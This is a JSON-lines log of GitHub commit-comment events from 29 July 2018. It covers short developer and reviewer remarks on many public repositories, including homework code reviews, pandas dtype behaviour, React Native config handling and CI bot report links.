{"id":"8033731905","type":"CommitCommentEvent","actor":{"login":"ButcherV"},"repo":{"name":"ButcherV/Vue-study"},"payload":{"comment":{"id":29873671,"position":15,"line":15,"path":"vue-tab.html","commit_id":"19647c0e77daec7b909975c41674221d7de324ca","created_at":"2018-07-29T10:12:41Z","updated_at":"2018-07-29T10:12:41Z","author_association":"OWNER","body":"1. v-if 和 v-for 的优先级关系。\r\n2. 换更优写法（不用 v-for）"}},"created_at":"2018-07-29T10:12:41Z"}
{"id":"8033735390","type":"CommitCommentEvent","actor":{"login":"adityagangadharam"},"repo":{"name":"adityagangadharam/DevOps_Training"},"payload":{"comment":{"id":29873682,"position":4,"line":7,"path":"index.html","commit_id":"ef2cd21ede97b657cf27c65bec292040e316b63f","created_at":"2018-07-29T10:15:33Z","updated_at":"2018-07-29T10:15:33Z","author_association":"OWNER","body":"hgfhggh"}},"created_at":"2018-07-29T10:15:33Z"}
{"id":"8033735535","type":"CommitCommentEvent","actor":{"login":"adityagangadharam"},"repo":{"name":"adityagangadharam/DevOps_Training"},"payload":{"comment":{"id":29873683,"position":null,"line":null,"path":null,"commit_id":"ef2cd21ede97b657cf27c65bec292040e316b63f","created_at":"2018-07-29T10:15:40Z","updated_at":"2018-07-29T10:15:40Z","author_association":"OWNER","body":"4465645"}},"created_at":"2018-07-29T10:15:40Z"}
{"id":"8033738472","type":"CommitCommentEvent","actor":{"login":"jreback"},"repo":{"name":"pandas-dev/pandas"},"payload":{"comment":{"id":29873684,"position":5,"line":700,"path":"pandas/tests/extension/integer/test_integer.py","commit_id":"5e8c1a4370b3bf8b6e350f61644dd46c4640c72b","created_at":"2018-07-29T10:18:03Z","updated_at":"2018-07-29T10:18:03Z","author_association":"CONTRIBUTOR","body":"it is always int64 for pandas \r\nthough numpy makes it platform dependent\r\n\r\nand my original PR had this as int64\r\nso would continue\r\n"}},"created_at":"2018-07-29T10:18:03Z"}
{"id":"8033739100","type":"CommitCommentEvent","actor":{"login":"jreback"},"repo":{"name":"pandas-dev/pandas"},"payload":{"comment":{"id":29873685,"position":5,"line":700,"path":"pandas/tests/extension/integer/test_integer.py","commit_id":"5e8c1a4370b3bf8b6e350f61644dd46c4640c72b","created_at":"2018-07-29T10:18:35Z","updated_at":"2018-07-29T10:18:35Z","author_association":"CONTRIBUTOR","body":"this is only if dtype is not specified or a float is passed in\r\n"}},"created_at":"2018-07-29T10:18:35Z"}
{"id":"8033741730","type":"CommitCommentEvent","actor":{"login":"pankaj28843"},"repo":{"name":"zoeyzou/hyf-homework"},"payload":{"comment":{"id":29873692,"position":136,"line":136,"path":"JavaScript-2/week6/homework/homework.js","commit_id":"3bf6d65e0c441b55cab352195a86e9a98768411d","created_at":"2018-07-29T10:20:36Z","updated_at":"2018-07-29T10:20:36Z","author_association":"NONE","body":"Nice! You have used the spread operator to collect variable number of arguments into an array."}},"created_at":"2018-07-29T10:20:36Z"}
{"id":"8033741793","type":"CommitCommentEvent","actor":{"login":"Alruddy"},"repo":{"name":"Alruddy/MiniOS"},"payload":{"comment":{"id":29873693,"position":17,"line":10,"path":"boot/loader.S","commit_id":"8d8189d02f961a479c0911014929978f3f4c0148","created_at":"2018-07-29T10:20:38Z","updated_at":"2018-07-29T10:20:38Z","author_association":"OWNER","body":"代码段GDT描述符： 段基址是0x00000000， 段界限是 0xffffffff"}},"created_at":"2018-07-29T10:20:38Z"}
{"id":"8033742797","type":"CommitCommentEvent","actor":{"login":"pankaj28843"},"repo":{"name":"zoeyzou/hyf-homework"},"payload":{"comment":{"id":29873694,"position":143,"line":143,"path":"JavaScript-2/week6/homework/homework.js","commit_id":"3bf6d65e0c441b55cab352195a86e9a98768411d","created_at":"2018-07-29T10:21:31Z","updated_at":"2018-07-29T10:21:31Z","author_association":"NONE","body":"because this function can be called with a variable number of column names, having a for loop will make this function more reusable."}},"created_at":"2018-07-29T10:21:31Z"}
{"id":"8033743302","type":"CommitCommentEvent","actor":{"login":"TomasVotruba"},"repo":{"name":"composer/packagist"},"payload":{"comment":{"id":29873695,"position":5,"line":159,"path":"src/Packagist/WebBundle/Resources/views/ApiDoc/index.html.twig","commit_id":"9cc78e0cbf1b256a88d916c91854ecc92fa783bf","created_at":"2018-07-29T10:22:00Z","updated_at":"2018-07-29T10:22:00Z","author_association":"NONE","body":"Is there any advantage over the old url? Both work now"}},"created_at":"2018-07-29T10:22:00Z"}
{"id":"8033743501","type":"CommitCommentEvent","actor":{"login":"pankaj28843"},"repo":{"name":"zoeyzou/hyf-homework"},"payload":{"comment":{"id":29873696,"position":152,"line":152,"path":"JavaScript-2/week6/homework/homework.js","commit_id":"3bf6d65e0c441b55cab352195a86e9a98768411d","created_at":"2018-07-29T10:22:11Z","updated_at":"2018-07-29T10:22:11Z","author_association":"NONE","body":"`domElement` will be a better name than `DOMEl`."}},"created_at":"2018-07-29T10:22:11Z"}
{"id":"8033752250","type":"CommitCommentEvent","actor":{"login":"pankaj28843"},"repo":{"name":"zoeyzou/hyf-homework"},"payload":{"comment":{"id":29873719,"position":107,"line":107,"path":"JavaScript-2/week6/homework/homework.js","commit_id":"3bf6d65e0c441b55cab352195a86e9a98768411d","created_at":"2018-07-29T10:29:41Z","updated_at":"2018-07-29T10:29:41Z","author_association":"NONE","body":"You should replace `http://` with `https://` to get rid of the following error in a modern browser\r\n\r\nURL: https://zoeyzou.github.io/hyf-homework/JavaScript-2/week6/homework/homework.html\r\n\r\n<img width=\"1567\" alt=\"screen shot 2018-07-29 at 12 28 15\" src=\"https://user-images.githubusercontent.com/432980/43365300-000f9a9e-932b-11e8-9b95-89c59083e818.png\">\r\n\r\n"}},"created_at":"2018-07-29T10:29:41Z"}
{"id":"8033753154","type":"CommitCommentEvent","actor":{"login":"csuhw"},"repo":{"name":"csuhw/SpringMVCDemo"},"payload":{"comment":{"id":29873723,"position":1,"line":1,"path":"test.txt","commit_id":"176505fb13c2f11779929863ba239e51052e8bbd","created_at":"2018-07-29T10:30:23Z","updated_at":"2018-07-29T10:30:23Z","author_association":"OWNER","body":"\r\nhello"}},"created_at":"2018-07-29T10:30:23Z"}
{"id":"8033753633","type":"CommitCommentEvent","actor":{"login":"kek-coin"},"repo":{"name":"bitcoin/bitcoin"},"payload":{"comment":{"id":29873724,"position":null,"line":null,"path":null,"commit_id":"d2186b3db61a9d4dc2d4a6211573790d9e34bf58","created_at":"2018-07-29T10:30:44Z","updated_at":"2018-07-29T10:30:44Z","author_association":"NONE","body":"@dginovker you seem to have the timeline mixed up here.\r\n\r\n> Seriously? You guys are that upset at Cøbra for not denouncing Bitcoin Cash?\r\n> \r\n> Edit: Stealing top comment to show how ridiculous Bitcoin Core maintainers have become. This is the shade they're throwing at Cobra for not calling BCH \"Bcash\" (note screencapture 7).\r\n\r\nThose screenshots were taken 3 days ago. This PR was merged 6 days ago."}},"created_at":"2018-07-29T10:30:44Z"}
{"id":"8033753991","type":"CommitCommentEvent","actor":{"login":"GreimuL"},"repo":{"name":"GreimuL/PS-in-BOJ"},"payload":{"comment":{"id":29873725,"position":null,"line":null,"path":null,"commit_id":"cfc445304565149e4be1327c046941bb15710810","created_at":"2018-07-29T10:31:01Z","updated_at":"2018-07-29T10:31:01Z","author_association":"OWNER","body":"test2"}},"created_at":"2018-07-29T10:31:01Z"}
{"id":"8033756292","type":"CommitCommentEvent","actor":{"login":"valerio-bozzolan"},"repo":{"name":"valerio-bozzolan/odoo-vagrant"},"payload":{"comment":{"id":29873726,"position":14,"line":8,"path":"Vagrantfile","commit_id":"6c7e4ef20277b8b5426e8f8b7ebe509d0afe93ce","created_at":"2018-07-29T10:32:58Z","updated_at":"2018-07-29T10:32:58Z","author_association":"OWNER","body":"Fixes https://github.com/Covetel/odoo-vagrant/pull/2."}},"created_at":"2018-07-29T10:32:58Z"}
{"id":"8033758372","type":"CommitCommentEvent","actor":{"login":"RGalanteG"},"repo":{"name":"RGalanteG/Azure-PAYG"},"payload":{"comment":{"id":29873728,"position":null,"line":null,"path":null,"commit_id":"9661566f32ee8354b30d60e225b781a6077828f2","created_at":"2018-07-29T10:34:49Z","updated_at":"2018-07-29T10:34:49Z","author_association":"OWNER","body":"`git reset HEAD^ --hard\r\ngit push origin -f HEAD:develop`"}},"created_at":"2018-07-29T10:34:49Z"}
{"id":"8033759654","type":"CommitCommentEvent","actor":{"login":"javisar"},"repo":{"name":"javisar/ONI-Modloader"},"payload":{"comment":{"id":29873730,"position":39,"line":139,"path":"Source/Injector/Injector.cs","commit_id":"2b5c28a7f72f8de230775bb14b9781a8f799f56e","created_at":"2018-07-29T10:35:52Z","updated_at":"2018-07-29T10:35:52Z","author_association":"OWNER","body":"No, it was a mistake. I did some testing and I left the code behind. Thank you for noticing it. I'll remove it."}},"created_at":"2018-07-29T10:35:52Z"}
{"id":"8033763126","type":"CommitCommentEvent","actor":{"login":"pankaj28843"},"repo":{"name":"zoeyzou/hyf-homework"},"payload":{"comment":{"id":29873739,"position":61,"line":61,"path":"JavaScript-2/week6/homework/homework.js","commit_id":"3bf6d65e0c441b55cab352195a86e9a98768411d","created_at":"2018-07-29T10:39:01Z","updated_at":"2018-07-29T10:39:01Z","author_association":"NONE","body":"for a search query like `java` you should make an api call to this url:\r\n\r\nhttps://api.github.com/search/repositories?q=user:HackYourFuture-CPH+java\r\n\r\n\r\nSo, url can be constructed like below:\r\n\r\n```js\r\nconst url = `https://api.github.com/search/repositories?q=user:HackYourFuture-CPH+${userInput}`;\r\n```\r\n\r\nPlease spend some time with this reponse, I think you can get it working after today's class."}},"created_at":"2018-07-29T10:39:01Z"}
{"id":"8033763173","type":"CommitCommentEvent","actor":{"login":"sureshrv83"},"repo":{"name":"sureshrv83/myGitRepo"},"payload":{"comment":{"id":29873740,"position":null,"line":null,"path":null,"commit_id":"99652ecae4f9683fd10fedf87780549c47643024","created_at":"2018-07-29T10:39:04Z","updated_at":"2018-07-29T10:39:04Z","author_association":"OWNER","body":"hi"}},"created_at":"2018-07-29T10:39:04Z"}
{"id":"8033765856","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29873741,"position":null,"line":null,"path":null,"commit_id":"adebe311c7bd5f237ba427652357433c21c77e66","created_at":"2018-07-29T10:41:20Z","updated_at":"2018-07-29T10:41:20Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 735](https://travis-ci.org/per1234/arduino-ci-script/builds/409493946) will be found at:\nhttps://gist.github.com/arduino-ci-script-bot/9371a7dedb73a560142ff2ca514b79db#file-travis_ci_job_report_00735-001-tsv"}},"created_at":"2018-07-29T10:41:20Z"}
{"id":"8033765985","type":"CommitCommentEvent","actor":{"login":"arduino-ci-script-bot"},"repo":{"name":"per1234/arduino-ci-script"},"payload":{"comment":{"id":29873742,"position":null,"line":null,"path":null,"commit_id":"adebe311c7bd5f237ba427652357433c21c77e66","created_at":"2018-07-29T10:41:26Z","updated_at":"2018-07-29T10:41:26Z","author_association":"NONE","body":"Once completed, the job reports for Travis CI [build 735](https://travis-ci.org/per1234/arduino-ci-script/builds/409493946) will be found at:\nhttps://github.com/per1234/CI-reports/tree/arduino-ci-script/build_00735"}},"created_at":"2018-07-29T10:41:26Z"}
{"id":"8033769774","type":"CommitCommentEvent","actor":{"login":"MarkusVolk"},"repo":{"name":"tuxbox-neutrino/plugin-scripts-lua"},"payload":{"comment":{"id":29873747,"position":null,"line":null,"path":null,"commit_id":"1e76817f9fb2d0a94f5b9c8b78b0424606010d42","created_at":"2018-07-29T10:44:27Z","updated_at":"2018-07-29T10:44:27Z","author_association":"COLLABORATOR","body":"hi,\r\n/etc/ neutrino/config is the default path for the neutrino config files in the yocto image. This has two reasons for me\r\n\r\n1. Almost all Unix tools store their global config in /etc and the user config in /home. I see no reason why one must deviate from the standard here.\r\n\r\n2. the more important reason ... With the Coolstream receivers, to save the settings, the complete var area was saved in a separate partition. This causes problems as soon as opkg is used. opkg stores the information about installed packages in /var.\r\nIn addition just about all the system's conf files to be backed up are stored in /etc ... I think of the network settings, hostname, autofs, minidlna, samba settings and so on. If you want to use /var for the backup, you would have to copy all these conf files from etc to var and from there create links to etc again\r\n\r\nThat's why I use etckeeper to backup selected files from etc and restore them after flashing\r\n\r\nI could also change the path to /var/tuxbox/config, because that is a link to /etc/neutrino/config in the yocto image. However, the stb plugins require systemd and therefore do not run in other images"}},"created_at":"2018-07-29T10:44:27Z"}
{"id":"8033770215","type":"CommitCommentEvent","actor":{"login":"EstenGrove"},"repo":{"name":"EstenGrove/Portfolio2"},"payload":{"comment":{"id":29873748,"position":null,"line":null,"path":null,"commit_id":"d78b723e4e871265f563a99943ba250e64bd7d50","created_at":"2018-07-29T10:44:47Z","updated_at":"2018-07-29T10:44:47Z","author_association":"OWNER","body":"Only includes the base center-aligned navbar and main site title, with a 2-color palate to help establish a color-scheme. "}},"created_at":"2018-07-29T10:44:47Z"}
{"id":"8033771093","type":"CommitCommentEvent","actor":{"login":"EthanWang90"},"repo":{"name":"EthanWang90/react-tutorial"},"payload":{"comment":{"id":29873752,"position":null,"line":null,"path":null,"commit_id":"2a039b2429470e478a1a04894a9c62d704a5a249","created_at":"2018-07-29T10:45:28Z","updated_at":"2018-07-29T10:45:28Z","author_association":"OWNER","body":"Besides, I added \"player\" state to check before handle the click, now I have \"X\" and \"O\", but this is not the official solution, maybe I need to rectify it later in order to synchronize with tutor. "}},"created_at":"2018-07-29T10:45:28Z"}
{"id":"8033772016","type":"CommitCommentEvent","actor":{"login":"Akuli"},"repo":{"name":"Akuli/porcupine"},"payload":{"comment":{"id":29873753,"position":null,"line":null,"path":null,"commit_id":"2f5fb90c44268b0391613fa7ed1d0319bf249c37","created_at":"2018-07-29T10:46:10Z","updated_at":"2018-07-29T10:46:10Z","author_association":"OWNER","body":"@PurpleMyst , I don't think this is a good idea, and the copy/pasta should be in porcupine instead. Here are a few reasons:\r\n\r\n- The algorithm is very slow with large files, but it can be optimized a lot in special cases, like pressing keys that insert text, pasting etc.\r\n- Other porcupine plugins might need to track changes too. The lsp plugin shouldn't be special in any way.\r\n- If something else uses your lsp client, it will also suffer from the slowness if the lsp client contains the slow code.\r\n\r\nYou can put the copy/pasta to porcupine/textwidget.py, the `<<ContentChanged>>` event is implemented there. I'm suggesting that `<<ContentChanged>>`'s data should contain information about what is where, so you could use `utils.bind_with_data` to get `(start, end, text)` triples. I can help you with implementing that or do it for you."}},"created_at":"2018-07-29T10:46:10Z"}
{"id":"8033773290","type":"CommitCommentEvent","actor":{"login":"pankaj28843"},"repo":{"name":"zuhairtaha/week6hw"},"payload":{"comment":{"id":29873754,"position":22,"line":22,"path":"app.js","commit_id":"2811a5db7fdd898fcaf2a5eb428ab2c4f503af63","created_at":"2018-07-29T10:47:19Z","updated_at":"2018-07-29T10:47:19Z","author_association":"NONE","body":"@zuhairtaha It is better to have local variables than global variables. If you have local variables, then it is a lot easier to understand what a function is trying to do, because it will be using variables local to its scope."}},"created_at":"2018-07-29T10:47:19Z"}
{"id":"8033774036","type":"CommitCommentEvent","actor":{"login":"inopinatus"},"repo":{"name":"sferik/rails_admin"},"payload":{"comment":{"id":29873756,"position":null,"line":null,"path":null,"commit_id":"1c1da371880d4de735008a54f1489061a458a4d5","created_at":"2018-07-29T10:48:01Z","updated_at":"2018-07-29T10:48:01Z","author_association":"NONE","body":"This change broke my entire application by duplicating middleware that was already present but with a different configuration.\r\n"}},"created_at":"2018-07-29T10:48:01Z"}
{"id":"8033774968","type":"CommitCommentEvent","actor":{"login":"ButcherV"},"repo":{"name":"ButcherV/Vue-study"},"payload":{"comment":{"id":29873763,"position":null,"line":null,"path":null,"commit_id":"19647c0e77daec7b909975c41674221d7de324ca","created_at":"2018-07-29T10:48:51Z","updated_at":"2018-07-29T10:48:51Z","author_association":"OWNER","body":"sdfasf"}},"created_at":"2018-07-29T10:48:51Z"}
{"id":"8033775351","type":"CommitCommentEvent","actor":{"login":"gdarquie"},"repo":{"name":"gdarquie/mibu"},"payload":{"comment":{"id":29873764,"position":null,"line":null,"path":null,"commit_id":"a91ed2a4055917c97c2d57e0e8fe988c49ce030b","created_at":"2018-07-29T10:49:10Z","updated_at":"2018-07-29T10:49:10Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [MI-5 : corrections des tests textes liés à item](https://trello.com/c/mAxGz7HB/170-mi-5-corrections-des-tests-textes-li%C3%A9s-%C3%A0-item)"}},"created_at":"2018-07-29T10:49:10Z"}
{"id":"8033775495","type":"CommitCommentEvent","actor":{"login":"Zodomaniac"},"repo":{"name":"fabiangreffrath/crispy-doom"},"payload":{"comment":{"id":29873765,"position":null,"line":null,"path":null,"commit_id":"e2f5a2d3775e29794a666aa36489fff5dc57ce5b","created_at":"2018-07-29T10:49:17Z","updated_at":"2018-07-29T10:49:17Z","author_association":"COLLABORATOR","body":"@fabiangreffrath I'll be able to test this on Wednesday, as this commit will make into tomorrow's daily build only and I'm going to a small 2-day holiday today by the night train.\r\nAt least @bradharding and @JNechaevsky confirm the positive effect. Great change, I think it's worth a near 5.3 release!"}},"created_at":"2018-07-29T10:49:17Z"}
{"id":"8033775805","type":"CommitCommentEvent","actor":{"login":"gdarquie"},"repo":{"name":"gdarquie/mibu"},"payload":{"comment":{"id":29873767,"position":null,"line":null,"path":null,"commit_id":"c877551a91b14ec73b9790f68a750a253bd6347c","created_at":"2018-07-29T10:49:34Z","updated_at":"2018-07-29T10:49:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Mi-4 : correction des tests](https://trello.com/c/yfRyZKHP/169-mi-4-correction-des-tests)"}},"created_at":"2018-07-29T10:49:34Z"}
{"id":"8033781570","type":"CommitCommentEvent","actor":{"login":"samitha9125"},"repo":{"name":"samitha9125/SinhalaTextClassification"},"payload":{"comment":{"id":29873782,"position":null,"line":null,"path":null,"commit_id":"47b384bb56deb625be15d52074b69af992c09c69","created_at":"2018-07-29T10:54:20Z","updated_at":"2018-07-29T10:54:20Z","author_association":"OWNER","body":"Final Commit"}},"created_at":"2018-07-29T10:54:20Z"}
{"id":"8033781740","type":"CommitCommentEvent","actor":{"login":"pankaj28843"},"repo":{"name":"zuhairtaha/week6hw"},"payload":{"comment":{"id":29873783,"position":101,"line":101,"path":"app.js","commit_id":"2811a5db7fdd898fcaf2a5eb428ab2c4f503af63","created_at":"2018-07-29T10:54:28Z","updated_at":"2018-07-29T10:54:28Z","author_association":"NONE","body":"Related to the previous comment about using local variables, I will have to scroll by >80 lines if I want to know what is the value of `btn` variable."}},"created_at":"2018-07-29T10:54:28Z"}
{"id":"8033782031","type":"CommitCommentEvent","actor":{"login":"ButcherV"},"repo":{"name":"ButcherV/Vue-study"},"payload":{"comment":{"id":29873784,"position":null,"line":null,"path":null,"commit_id":"19647c0e77daec7b909975c41674221d7de324ca","created_at":"2018-07-29T10:54:43Z","updated_at":"2018-07-29T10:54:43Z","author_association":"OWNER","body":"1. 三括号的形式：{{{}}} 既等于 v-html 的形式，vue.2.0 这种语法已经不存在？\r\nvue 2.x 的文档中只提了 v-html，并没有 {{{}}}\r\nvue 1.0 的文档中只有 {{{}}}，没有 v-html"}},"created_at":"2018-07-29T10:54:43Z"}
{"id":"8033788044","type":"CommitCommentEvent","actor":{"login":"racha999"},"repo":{"name":"jlord/sheetsee.js"},"payload":{"comment":{"id":29873794,"position":null,"line":null,"path":null,"commit_id":"c62feb53439deb484c0240215526a5042febae2d","created_at":"2018-07-29T10:59:46Z","updated_at":"2018-07-29T10:59:46Z","author_association":"NONE","body":"#47 \r\n\r\n"}},"created_at":"2018-07-29T10:59:46Z"}
{"id":"8033788094","type":"CommitCommentEvent","actor":{"login":"Plajer"},"repo":{"name":"Plajer-Lair/Village_Defense"},"payload":{"comment":{"id":29873795,"position":null,"line":null,"path":null,"commit_id":"582f0e78d0dea72ca05062212b6c4e84a57f87b6","created_at":"2018-07-29T10:59:48Z","updated_at":"2018-07-29T10:59:48Z","author_association":"MEMBER","body":"When I update both IntelliJ and all plugins Lombok broke my code removing some methods and breaking other things so I removed it."}},"created_at":"2018-07-29T10:59:48Z"}
{"id":"8033790661","type":"CommitCommentEvent","actor":{"login":"rafeca"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29873806,"position":71,"line":132,"path":"local-cli/core/index.js","commit_id":"a32620dc3b7a0ebd53feeaf7794051705d80f49e","created_at":"2018-07-29T11:01:39Z","updated_at":"2018-07-29T11:01:39Z","author_association":"MEMBER","body":"Thanks for the report! @CompuIves we should add a simple check here"}},"created_at":"2018-07-29T11:01:39Z"}
{"id":"8033792136","type":"CommitCommentEvent","actor":{"login":"amanda-lan"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29873808,"position":8,"line":4,"path":"www/home.php","commit_id":"586071c07cfe17068364231a773fa4b940f35275","created_at":"2018-07-29T11:02:47Z","updated_at":"2018-07-29T11:02:47Z","author_association":"OWNER","body":"done"}},"created_at":"2018-07-29T11:02:47Z"}
{"id":"8033796545","type":"CommitCommentEvent","actor":{"login":"c506928109"},"repo":{"name":"c506928109/Blog"},"payload":{"comment":{"id":29873812,"position":null,"line":null,"path":null,"commit_id":"2b5e623ff4ae237d79e94c7c587918929885602e","created_at":"2018-07-29T11:06:28Z","updated_at":"2018-07-29T11:06:28Z","author_association":"OWNER","body":"Rollback"}},"created_at":"2018-07-29T11:06:28Z"}
{"id":"8033796943","type":"CommitCommentEvent","actor":{"login":"amanda-lan"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29873816,"position":31,"line":24,"path":"www/newindex.php","commit_id":"586071c07cfe17068364231a773fa4b940f35275","created_at":"2018-07-29T11:06:47Z","updated_at":"2018-07-29T11:06:47Z","author_association":"OWNER","body":"意思是remove cookie吗？"}},"created_at":"2018-07-29T11:06:47Z"}
{"id":"8033800310","type":"CommitCommentEvent","actor":{"login":"amanda-lan"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29873820,"position":38,"line":39,"path":"www/signup.php","commit_id":"586071c07cfe17068364231a773fa4b940f35275","created_at":"2018-07-29T11:09:38Z","updated_at":"2018-07-29T11:09:38Z","author_association":"OWNER","body":"you mean redirect to login pay not logout right?"}},"created_at":"2018-07-29T11:09:38Z"}
{"id":"8033800814","type":"CommitCommentEvent","actor":{"login":"amanda-lan"},"repo":{"name":"amanda-lan/UserLoginService"},"payload":{"comment":{"id":29873821,"position":38,"line":39,"path":"www/signup.php","commit_id":"586071c07cfe17068364231a773fa4b940f35275","created_at":"2018-07-29T11:10:06Z","updated_at":"2018-07-29T11:10:06Z","author_association":"OWNER","body":"or just logout?"}},"created_at":"2018-07-29T11:10:06Z"}
{"id":"8033801184","type":"CommitCommentEvent","actor":{"login":"rafeca"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29873822,"position":84,"line":90,"path":"local-cli/util/Config.js","commit_id":"a32620dc3b7a0ebd53feeaf7794051705d80f49e","created_at":"2018-07-29T11:10:24Z","updated_at":"2018-07-29T11:10:24Z","author_association":"MEMBER","body":"oh damm it! we need to change strategy to merge config params,  since with RN the priority of params should be the following:\r\n\r\n1- User's defined `rn-cli.config.js`\r\n2- RN default params (`this.DEFAULT`).\r\n3- Metro default params.\r\n\r\nWe can make the `Metro.loadConfig()` method to accept an additional optional `InputConfigT` param and merge it with the default config before merging the user defined config (e.g after [this](https://github.com/facebook/metro/blob/master/packages/metro-config/src/loadConfig.js#L143)).\r\n\r\n@CompuIves can you fix this?"}},"created_at":"2018-07-29T11:10:24Z"}
{"id":"8033802186","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29873823,"position":null,"line":null,"path":null,"commit_id":"fc3b904e1f64b7d53d7c8f11edd8ef434612f46e","created_at":"2018-07-29T11:11:14Z","updated_at":"2018-07-29T11:11:14Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/link-rewrites-not-working/86693/8\n"}},"created_at":"2018-07-29T11:11:14Z"}
{"id":"8033804118","type":"CommitCommentEvent","actor":{"login":"rafeca"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29873825,"position":84,"line":90,"path":"local-cli/util/Config.js","commit_id":"a32620dc3b7a0ebd53feeaf7794051705d80f49e","created_at":"2018-07-29T11:12:53Z","updated_at":"2018-07-29T11:12:53Z","author_association":"MEMBER","body":"(or @janicduplessis, are you up to fix this? 😃)"}},"created_at":"2018-07-29T11:12:53Z"}
{"id":"8033809917","type":"CommitCommentEvent","actor":{"login":"DezterChen"},"repo":{"name":"DezterChen/AutoWorkApps"},"payload":{"comment":{"id":29873829,"position":null,"line":null,"path":null,"commit_id":"6b77a3dccbff46df9f74fae94041cc04764d6a44","created_at":"2018-07-29T11:17:40Z","updated_at":"2018-07-29T11:17:40Z","author_association":"OWNER","body":"Crawler data from PLM and record the result in excel"}},"created_at":"2018-07-29T11:17:40Z"}
{"id":"8033809986","type":"CommitCommentEvent","actor":{"login":"moodisd"},"repo":{"name":"Hack-with-Github/Awesome-Hacking"},"payload":{"comment":{"id":29873830,"position":null,"line":null,"path":null,"commit_id":"123ffd5a5a45b5fa732876f7a7dbb164734c10ee","created_at":"2018-07-29T11:17:43Z","updated_at":"2018-07-29T11:17:43Z","author_association":"NONE","body":"hey"}},"created_at":"2018-07-29T11:17:43Z"}
{"id":"8033811817","type":"CommitCommentEvent","actor":{"login":"ashaygore"},"repo":{"name":"MycroftAI/mycroft-core"},"payload":{"comment":{"id":29873831,"position":null,"line":null,"path":null,"commit_id":"c292de0dea8ba74e32a4973a9d3645b35cc965fd","created_at":"2018-07-29T11:19:08Z","updated_at":"2018-07-29T11:19:08Z","author_association":"NONE","body":"HI"}},"created_at":"2018-07-29T11:19:08Z"}
{"id":"8033812364","type":"CommitCommentEvent","actor":{"login":"ashaygore"},"repo":{"name":"MycroftAI/mycroft-core"},"payload":{"comment":{"id":29873832,"position":null,"line":null,"path":null,"commit_id":"c292de0dea8ba74e32a4973a9d3645b35cc965fd","created_at":"2018-07-29T11:19:34Z","updated_at":"2018-07-29T11:19:34Z","author_association":"NONE","body":"can i build my own voice assistant ? like ok google , varvis"}},"created_at":"2018-07-29T11:19:34Z"}
{"id":"8033813751","type":"CommitCommentEvent","actor":{"login":"ttakuru88"},"repo":{"name":"hasehiro25/kuso_blog_project"},"payload":{"comment":{"id":29873833,"position":5,"line":15,"path":"app/assets/javascripts/images.coffee","commit_id":"09f7f283648af8940e369c7e44cf2ce2e54de8d7","created_at":"2018-07-29T11:20:45Z","updated_at":"2018-07-29T11:20:45Z","author_association":"NONE","body":"```\r\nbody.val(\"\"\"#{body.val()}<img src=\"#{file.url}\">\"\"\")\r\n```"}},"created_at":"2018-07-29T11:20:45Z"}
{"id":"8033813869","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29873834,"position":null,"line":null,"path":null,"commit_id":"342662ff7225993e253f37b56707aae66b0d51fb","created_at":"2018-07-29T11:20:51Z","updated_at":"2018-07-29T11:20:51Z","author_association":"OWNER","body":"please run [test]"}},"created_at":"2018-07-29T11:20:51Z"}
{"id":"8033814365","type":"CommitCommentEvent","actor":{"login":"spacemud"},"repo":{"name":"LinkyLuke/teachtime"},"payload":{"comment":{"id":29873835,"position":5,"line":5,"path":"teachtime/teachtime.py","commit_id":"2e598c8fa2a0256b3c46392179fb19ba01a54f1e","created_at":"2018-07-29T11:21:15Z","updated_at":"2018-07-29T11:21:15Z","author_association":"COLLABORATOR","body":"💩 "}},"created_at":"2018-07-29T11:21:15Z"}
{"id":"8033815291","type":"CommitCommentEvent","actor":{"login":"espritolka"},"repo":{"name":"espritolka/expenses"},"payload":{"comment":{"id":29873837,"position":null,"line":null,"path":null,"commit_id":"9884f5b3470b90737a23700e7678c5da5e5393d1","created_at":"2018-07-29T11:22:05Z","updated_at":"2018-07-29T11:22:05Z","author_association":"OWNER","body":"*material"}},"created_at":"2018-07-29T11:22:05Z"}
{"id":"8033826198","type":"CommitCommentEvent","actor":{"login":"LongCatIsLooong"},"repo":{"name":"LongCatIsLooong/PunOko"},"payload":{"comment":{"id":29873855,"position":null,"line":null,"path":null,"commit_id":"342662ff7225993e253f37b56707aae66b0d51fb","created_at":"2018-07-29T11:31:01Z","updated_at":"2018-07-29T11:31:01Z","author_association":"OWNER","body":"please run [build]"}},"created_at":"2018-07-29T11:31:01Z"}
{"id":"8033829047","type":"CommitCommentEvent","actor":{"login":"pYtato-KK"},"repo":{"name":"pYtato-KK/ProLog"},"payload":{"comment":{"id":29873862,"position":null,"line":null,"path":null,"commit_id":"14d51fa3a294338ffebe96002f0f7b6a64fcaf27","created_at":"2018-07-29T11:33:13Z","updated_at":"2018-07-29T11:33:13Z","author_association":"OWNER","body":"I've done that change 3 times and you reverted it... Smh"}},"created_at":"2018-07-29T11:33:13Z"}
{"id":"8033829738","type":"CommitCommentEvent","actor":{"login":"Zelofff"},"repo":{"name":"serginij/reactBlog"},"payload":{"comment":{"id":29873863,"position":15,"line":9,"path":"src/components/Card/Card.js","commit_id":"2643dab9e7ddaf05ca01c3ee883b85635b29814e","created_at":"2018-07-29T11:33:48Z","updated_at":"2018-07-29T11:33:48Z","author_association":"NONE","body":"Когда у тебя stateless компонент, можно сделать так\r\nconst card = ({ title, text, img, author, onClick }) => ( ... )"}},"created_at":"2018-07-29T11:33:48Z"}
